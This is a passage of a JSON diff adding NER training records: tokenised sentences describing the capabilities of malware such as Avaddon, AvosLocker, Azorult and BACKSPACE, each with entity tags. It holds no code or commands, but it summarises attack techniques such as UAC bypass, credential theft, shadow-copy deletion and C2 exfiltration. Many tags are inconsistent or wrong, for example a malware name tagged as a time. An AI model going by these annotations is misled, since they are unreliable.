"key", + "which", + "is", + "encrypted", + "with", + "a", + "public", + "RSA", + "key." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Attor", + "can", + "detect", + "whether", + "it", + "is", + "executed", + "in", + "some", + "virtualized", + "or", + "emulated", + "environment", + "by", + "searching", + "for", + "specific", + "artifacts,", + "such", + "as", + "communication", + "with", + "I/O", + "ports", + "and", + "using", + "VM-specific", + "instructions." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "Attor", + "monitors", + "the", + "free", + "disk", + "space", + "on", + "the", + "system." + ], + "ner_tags": [ + "B-SamFile", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Attor", + "has", + "manipulated", + "the", + "time", + "of", + "last", + "access", + "to", + "files", + "and", + "registry", + "keys", + "after", + "they", + "have", + "been", + "created", + "or", + "modified." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-OffAct", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Attor's", + "dispatcher", + "can", + "establish", + "persistence", + "by", + "registering", + "a", + "new", + "service." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "AuTo", + "Stealer", + "can", + "collect", + "data", + "such", + "as", + "PowerPoint", + "files,", + "Word", + "documents,", + "Excel", + "files,", + "PDF", + "files,", + "text", + "files,", + "database", + "files,", + "and", + "image", + "files", + "from", + "an", + "infected", + "machine." + ], + "ner_tags": [ + "B-SamFile", + "B-SecTeam", + "O", + "I-Features", + "I-Features", + "O", + "O", + "B-Way", + "B-Tool", + "I-Tool", + "O", + "B-Way", + "B-Tool", + "I-Tool", + "O", + "I-Tool", + "O", + "I-Features", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "AuTo", + "Stealer", + "can", + "exfiltrate", + "data", + "over", + "actor-controlled", + "C2", + "servers", + "via", + "HTTP", + "or", + "TCP." + ], + "ner_tags": [ + "B-Way", + "B-HackOrg", + "O", + "B-SamFile", + "B-Purp", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "AuTo", + "Stealer", + "can", + "store", + "collected", + "data", + "from", + "an", + "infected", + "host", + "to", + "a", + "file", + "named", + "`Hostname_UserName.txt`", + "prior", + "to", + "exfiltration." + ], + "ner_tags": [ + "B-SamFile", + "B-SecTeam", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "AuTo", + "Stealer", + "can", + "use", + "TCP", + "to", + "communicate", + "with", + "command", + "and", + "control", + "servers." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "AuTo", + "Stealer", + "can", + "place", + "malicious", + "executables", + "in", + "a", + "victim's", + "AutoRun", + "registry", + "key", + "or", + "StartUp", + "directory,", + "depending", + "on", + "the", + "AV", + "product", + "installed,", + "to", + "maintain", + "persistence." + ], + "ner_tags": [ + "B-SamFile", + "B-SecTeam", + "O", + "B-Features", + "B-HackOrg", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "AuTo", + "Stealer", + "has", + "the", + "ability", + "to", + "collect", + "information", + "about", + "installed", + "AV", + "products", + "from", + "an", + "infected", + "host." + ], + "ner_tags": [ + "B-SamFile", + "B-SecTeam", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "AuTo", + "Stealer", + "has", + "the", + "ability", + "to", + "collect", + "the", + "hostname", + "and", + "OS", + "information", + "from", + "an", + "infected", + "host." + ], + "ner_tags": [ + "B-SamFile", + "B-SecTeam", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "AuTo", + "Stealer", + "has", + "the", + "ability", + "to", + "collect", + "the", + "username", + "from", + "an", + "infected", + "host." + ], + "ner_tags": [ + "B-SamFile", + "B-SecTeam", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "AuTo", + "Stealer", + "can", + "use", + "HTTP", + "to", + "communicate", + "with", + "its", + "C2", + "servers." + ], + "ner_tags": [ + "B-Idus", + "B-HackOrg", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "AuTo", + "Stealer", + "can", + "use", + "`cmd.exe`", + "to", + "execute", + "a", + "created", + "batch", + "file." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "AuditCred", + "uses", + "XOR", + "and", + "RC4", + "to", + "perform", + "decryption", + "on", + "the", + "code", + "functions." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "AuditCred", + "encrypts", + "the", + "configuration." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "AuditCred", + "can", + "delete", + "files", + "from", + "the", + "system." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "I-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "AuditCred", + "can", + "search", + "through", + "folders", + "and", + "files", + "on", + "the", + "system." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "AuditCred", + "can", + "download", + "files", + "and", + "additional", + "malware." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "O", + "I-Features", + "B-HackOrg" + ] + }, + { + "tokens": [ + "AuditCred", + "can", + "inject", + "code", + "from", + "files", + "to", + "other", + "running", + "processes." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "AuditCred", + "can", + "utilize", + "proxy", + "for", + "communications." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "B-Idus" + ] + }, + { + "tokens": [ + "AuditCred", + "can", + "open", + "a", + "reverse", + "shell", + "on", + "the", + "system", + "to", + "execute", + "commands." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "AuditCred", + "is", + "installed", + "as", + "a", + "new", + "service", + "on", + "the", + "system." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "AutoIt", + "backdoor", + "attempts", + "to", + "escalate", + "privileges", + "by", + "bypassing", + "User", + "Access", + "Control." + ], + "ner_tags": [ + "B-SamFile", + "B-SecTeam", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "AutoIt", + "backdoor", + "is", + "capable", + "of", + "identifying", + "documents", + "on", + "the", + "victim", + "with", + "the", + "following", + "extensions:", + ".doc;", + ".pdf,", + ".csv,", + ".ppt,", + ".docx,", + ".pst,", + ".xls,", + ".xlsx,", + ".pptx,", + "and", + ".jpeg." + ], + "ner_tags": [ + "B-SamFile", + "B-SecTeam", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "AutoIt", + "backdoor", + "downloads", + "a", + "PowerShell", + "script", + "that", + "decodes", + "to", + "a", + "typical", + "shellcode", + "loader." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "AutoIt", + "backdoor", + "has", + "sent", + "a", + "C2", + "response", + "that", + "was", + "base64-encoded." + ], + "ner_tags": [ + "B-SamFile", + "B-SecTeam", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Avaddon", + "bypasses", + "UAC", + "using", + "the", + "CMSTPLUA", + "COM", + "interface." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "Avaddon", + "encrypts", + "the", + "victim", + "system", + "using", + "a", + "combination", + "of", + "AES256", + "and", + "RSA", + "encryption", + "schemes." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "Avaddon", + "has", + "decrypted", + "encrypted", + "strings." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Avaddon", + "looks", + "for", + "and", + "attempts", + "to", + "stop", + "anti-malware", + "solutions." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Avaddon", + "has", + "searched", + "for", + "specific", + "files", + "prior", + "to", + "encryption." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Avaddon", + "deletes", + "backups", + "and", + "shadow", + "copies", + "using", + "native", + "system", + "tools." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Avaddon", + "has", + "been", + "executed", + "through", + "a", + "malicious", + "JScript", + "downloader." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "Avaddon", + "modifies", + "several", + "registry", + "keys", + "for", + "persistence", + "and", + "UAC", + "bypass." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "I-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Avaddon", + "has", + "used", + "the", + "Windows", + "Crypto", + "API", + "to", + "generate", + "an", + "AES", + "key." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Avaddon", + "has", + "enumerated", + "shared", + "folders", + "and", + "mapped", + "volumes." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Avaddon", + "has", + "used", + "encrypted", + "strings." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Avaddon", + "has", + "collected", + "information", + "about", + "running", + "processes." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Avaddon", + "uses", + "registry", + "run", + "keys", + "for", + "persistence." + ], + "ner_tags": [ + "B-Idus", + "O", + "I-Tool", + "I-Tool", + "I-Tool", + "O", + "O" + ] + }, + { + "tokens": [ + "Avaddon", + "looks", + "for", + "and", + "attempts", + "to", + "stop", + "database", + "processes." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Avaddon", + "checks", + "for", + "specific", + "keyboard", + "layouts", + "and", + "OS", + "languages", + "to", + "avoid", + "targeting", + "Commonwealth", + "of", + "Independent", + "States", + "(CIS)", + "entities." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Avaddon", + "can", + "collect", + "the", + "external", + "IP", + "address", + "of", + "the", + "victim." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Avaddon", + "uses", + "wmic.exe", + "to", + "delete", + "shadow", + "copies." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Avenger", + "has", + "the", + "ability", + "to", + "decrypt", + "files", + "downloaded", + "from", + "C2." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "I-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Avenger", + "has", + "the", + "ability", + "to", + "XOR", + "encrypt", + "files", + "to", + "be", + "sent", + "to", + "C2." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "B-Features", + "B-HackOrg", + "I-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Avenger", + "has", + "the", + "ability", + "to", + "browse", + "files", + "in", + "directories", + "such", + "as", + "Program", + "Files", + "and", + "the", + "Desktop." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "B-Features", + "I-Features", + "O", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Avenger", + "has", + "the", + "ability", + "to", + "download", + "files", + "from", + "C2", + "to", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Avenger", + "has", + "the", + "ability", + "to", + "use", + "Tasklist", + "to", + "identify", + "running", + "processes." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Avenger", + "has", + "the", + "ability", + "to", + "inject", + "shellcode", + "into", + "svchost.exe." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Avenger", + "has", + "the", + "ability", + "to", + "identify", + "installed", + "anti-virus", + "products", + "on", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Avenger", + "can", + "extract", + "backdoor", + "malware", + "from", + "downloaded", + "images." + ], + "ner_tags": [ + "B-Idus", + "O", + "I-Features", + "B-HackOrg", + "B-HackOrg", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Avenger", + "has", + "the", + "ability", + "to", + "identify", + "the", + "host", + "volume", + "ID", + "and", + "the", + "OS", + "architecture", + "on", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Avenger", + "can", + "identify", + "the", + "domain", + "of", + "the", + "compromised", + "host." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Avenger", + "has", + "the", + "ability", + "to", + "use", + "HTTP", + "in", + "communication", + "with", + "C2." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "AvosLocker", + "has", + "encrypted", + "files", + "and", + "network", + "resources", + "using", + "AES-256", + "and", + "added", + "an", + "`.avos`,", + "`.avos2`,", + "or", + "`.AvosLinux`", + "extension", + "to", + "filenames." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "B-SamFile", + "B-SamFile", + "O", + "B-SamFile", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "AvosLocker", + "has", + "deobfuscated", + "XOR-encoded", + "strings." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "AvosLocker", + "has", + "used", + "obfuscated", + "API", + "calls", + "that", + "are", + "retrieved", + "by", + "their", + "checksums." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "AvosLocker", + "has", + "searched", + "for", + "files", + "and", + "directories", + "on", + "a", + "compromised", + "network." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "AvosLocker", + "has", + "hidden", + "its", + "console", + "window", + "by", + "using", + "the", + "`ShowWindow`", + "API", + "function." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "AvosLocker", + "has", + "been", + "disguised", + "as", + "a", + ".jpg", + "file." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "AvosLocker", + "has", + "used", + "a", + "variety", + "of", + "Windows", + "API", + "calls,", + "including", + "`NtCurrentPeb`", + "and", + "`GetLogicalDrives`." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "AvosLocker", + "has", + "enumerated", + "shared", + "drives", + "on", + "a", + "compromised", + "network." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "AvosLocker", + "has", + "used", + "XOR-encoded", + "strings." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "AvosLocker", + "has", + "discovered", + "system", + "processes", + "by", + "calling", + "`RmGetList`." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "AvosLocker", + "has", + "been", + "executed", + "via", + "the", + "`RunOnce`", + "Registry", + "key", + "to", + "run", + "itself", + "on", + "safe", + "mode." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "AvosLocker", + "can", + "restart", + "a", + "compromised", + "machine", + "in", + "safe", + "mode." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "AvosLocker", + "has", + "terminated", + "specific", + "processes", + "before", + "encryption." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "AvosLocker’s", + "Linux", + "variant", + "has", + "terminated", + "ESXi", + "virtual", + "machines." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "AvosLocker", + "has", + "checked", + "the", + "system", + "time", + "before", + "and", + "after", + "encryption." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Azorult", + "can", + "call", + "WTSQueryUserToken", + "and", + "CreateProcessAsUser", + "to", + "start", + "a", + "new", + "process", + "with", + "local", + "system", + "privileges." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Azorult", + "can", + "steal", + "credentials", + "in", + "files", + "belonging", + "to", + "common", + "software", + "such", + "as", + "Skype,", + "Telegram,", + "and", + "Steam." + ], + "ner_tags": [ + "B-Idus", + "O", + "I-Purp", + "I-Purp", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Way", + "O", + "B-Tool" + ] + }, + { + "tokens": [ + "Azorult", + "can", + "steal", + "credentials", + "from", + "the", + "victim's", + "browser." + ], + "ner_tags": [ + "B-Idus", + "O", + "I-Purp", + "I-Purp", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Azorult", + "uses", + "an", + "XOR", + "key", + "to", + "decrypt", + "content", + "and", + "uses", + "Base64", + "to", + "decode", + "the", + "C2", + "address." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Purp", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Azorult", + "can", + "delete", + "files", + "from", + "victim", + "machines." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "I-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Azorult", + "can", + "recursively", + "search", + "for", + "files", + "in", + "folders", + "and", + "collects", + "files", + "from", + "the", + "desktop", + "with", + "certain", + "extensions." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Azorult", + "can", + "download", + "and", + "execute", + "additional", + "files.", + "Azorult", + "has", + "also", + "downloaded", + "a", + "ransomware", + "payload", + "called", + "Hermes." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "I-Features", + "I-Features", + "O", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Azorult", + "can", + "collect", + "a", + "list", + "of", + "running", + "processes", + "by", + "calling", + "CreateToolhelp32Snapshot." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "Azorult", + "can", + "decrypt", + "the", + "payload", + "into", + "memory,", + "create", + "a", + "new", + "suspended", + "process", + "of", + "itself,", + "then", + "inject", + "a", + "decrypted", + "payload", + "to", + "the", + "new", + "process", + "and", + "resume", + "new", + "process", + "execution." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "I-Way", + "I-Way", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Azorult", + "can", + "check", + "for", + "installed", + "software", + "on", + "the", + "system", + "under", + "the", + "Registry", + "key", + "<code>Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall</code>." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Azorult", + "can", + "capture", + "screenshots", + "of", + "the", + "victim’s", + "machines." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Azorult", + "can", + "encrypt", + "C2", + "traffic", + "using", + "XOR." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "B-HackOrg", + "B-Features", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Azorult", + "can", + "collect", + "the", + "machine", + "information,", + "system", + "architecture,", + "the", + "OS", + "version,", + "computer", + "name,", + "Windows", + "product", + "name,", + "the", + "number", + "of", + "CPU", + "cores,", + "video", + "card", + "information,", + "and", + "the", + "system", + "language." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Azorult", + "can", + "collect", + "host", + "IP", + "information", + "from", + "the", + "victim’s", + "machine." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Azorult", + "can", + "collect", + "the", + "username", + "from", + "the", + "victim’s", + "machine." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Azorult", + "can", + "collect", + "the", + "time", + "zone", + "information", + "from", + "the", + "system." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "\"ZR\"", + "variant", + "of", + "BACKSPACE", + "will", + "check", + "to", + "see", + "if", + "known", + "host-based", + "firewalls", + "are", + "installed", + "on", + "the", + "infected", + "systems.", + "BACKSPACE", + "will", + "attempt", + "to", + "establish", + "a", + "C2", + "channel,", + "then", + "will", + "examine", + "open", + "windows", + "to", + "identify", + "a", + "pop-up", + "from", + "the", + "firewall", + "software", + "and", + "will", + "simulate", + "a", + "mouse-click", + "to", + "allow", + "the", + "connection", + "to", + "proceed." + ], + "ner_tags": [ + "O", + "B-Way", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Adversaries", + "can", + "direct", + "BACKSPACE", + "to", + "upload", + "files", + "to", + "the", + "C2", + "Server." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BACKSPACE", + "allows", + "adversaries", + "to", + "search", + "for", + "files." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "The", + "\"ZJ\"", + "variant", + "of", + "BACKSPACE", + "allows", + "\"ZJ", + "link\"", + "infections", + "with", + "Internet", + "access", + "to", + "relay", + "traffic", + "from", + "\"ZJ", + "listen\"", + "to", + "a", + "command", + "server." + ], + "ner_tags": [ + "O", + "B-Way", + "O", + "O", + "B-Way", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BACKSPACE", + "is", + "capable", + "of", + "deleting", + "Registry", + "keys,", + "sub-keys,", + "and", + "values", + "on", + "a", + "victim", + "system." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "B-Features", + "B-HackOrg", + "B-Features", + "B-Features", + "O", + "B-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BACKSPACE", + "attempts", + "to", + "avoid", + "detection", + "by", + "checking", + "a", + "first", + "stage", + "command", + "and", + "control", + "server", + "to", + "determine", + "if", + "it", + "should", + "connect", + "to", + "the", + "second", + "stage", + "server,", + "which", + "performs", + "\"louder\"", + "interactions", + "with", + "the", + "malware." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Newer", + "variants", + "of", + "BACKSPACE", + "will", + "encode", + "C2", + "communications", + "with", + "a", + "custom", + "system." + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BACKSPACE", + "may", + "collect", + "information", + "about", + "running", + "processes." + ], + "ner_tags": [ + "B-Way", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BACKSPACE", + "is", + "capable", + "of", + "enumerating", + "and", + "making", + "modifications", + "to", + "an", + "infected", + "system's", + "Registry." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "B-Features", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "BACKSPACE", + "achieves", + "persistence", + "by", + "creating", + "a", + "shortcut", + "to", + "itself", + "in", + "the", + "CSIDL_STARTUP", + "directory." + ], + "ner_tags": [ + "B-Way", 